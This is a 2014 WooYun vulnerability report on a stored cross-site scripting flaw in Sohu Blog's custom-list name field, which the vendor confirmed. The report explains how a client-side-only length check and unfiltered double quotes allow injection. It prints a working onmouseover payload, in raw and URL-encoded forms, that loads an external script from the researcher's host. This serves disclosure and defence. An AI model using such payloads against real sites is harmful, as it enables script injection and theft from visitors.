当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050193

漏洞标题:搜狐博客存储型XSS漏洞

相关厂商:搜狐

漏洞作者: q601333824

提交时间:2014-02-02 10:54

修复时间:2014-03-19 10:55

公开时间:2014-03-19 10:55

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:4

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-02: 细节已通知厂商并且等待厂商处理中
2014-02-03: 厂商已经确认,细节仅向厂商公开
2014-02-13: 细节向核心白帽子及相关领域专家公开
2014-02-23: 细节向普通白帽子公开
2014-03-05: 细节向实习白帽子公开
2014-03-19: 细节向公众公开

简要描述:

搜狐博客XSS

详细说明:


1.存在XSS的功能位置,添加模块---自定义列表---名称一栏,如图

1.png


2.png


2.名称那一栏会提示标题字数太多了,所以上次想提交,又觉得鸡肋,但是后来发现了,这里的标题字数,只是本地检查,服务器端根本没有进行检查,只要用一些post软件直接post就绕过标题字数限制了........
3.由于名称处,没有对双引号,进行过滤,再加上能绕过字数检查,知道这个就能构造XSS,用onmouseover触发XSS,把style属性设置一下显示全屏,这样打开博客鼠标移动到哪都能触发XSS
4.先构造好代码加载外部JS:
(1)"onmouseover="var s=document.createElement("script");s.src="http://q601333824.duapp.com/";document.body.appendChild(s);"style="left: 0px; top: -8px; width: 100%; height: 100%; position: fixed; cursor: default !important;"
(2)由于要post,还要进行编码:%5C%22onmouseover%3D%5C%22var%20s%3ddocument.createElement(%26%2339%3bscript%26%2339%3b)%3bs.src%3d%26%2339%3bhttp%3a%2f%2fq601333824.duapp.com%2f%26%2339%3b%3bdocument.body.appendChild(s)%3b%5C%22style%3D%5C%22left%3a%200px%3b%20top%3a%20-8px%3b%20width%3a%20100%25%3b%20height%3a%20100%25%3b%20position%3a%20fixed%3b%20%5C%22
(不编码post试过了,要么自定义模块内容直接被清空了,要么标签错乱=_=)
5.然后post修改名称,如图

4.png


6.打开博客的时候鼠标只要移动,就能触发XSS了,,给出了代码存在的位置

5.png


(没想到名称能打那么长=_=)

漏洞证明:

1.

1.png


2.png


2.用post的软件发送代码:
%5C%22onmouseover%3D%5C%22var%20s%3ddocument.createElement(%26%2339%3bscript%26%2339%3b)%3bs.src%3d%26%2339%3bhttp%3a%2f%2fq601333824.duapp.com%2f%26%2339%3b%3bdocument.body.appendChild(s)%3b%5C%22style%3D%5C%22left%3a%200px%3b%20top%3a%20-8px%3b%20width%3a%20100%25%3b%20height%3a%20100%25%3b%20position%3a%20fixed%3b%20%5C%22
3.

4.png


4.

5.png

修复方案:

过滤双引号就行了

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-02-03 12:27

厂商回复:

感谢支持。

最新状态:

暂无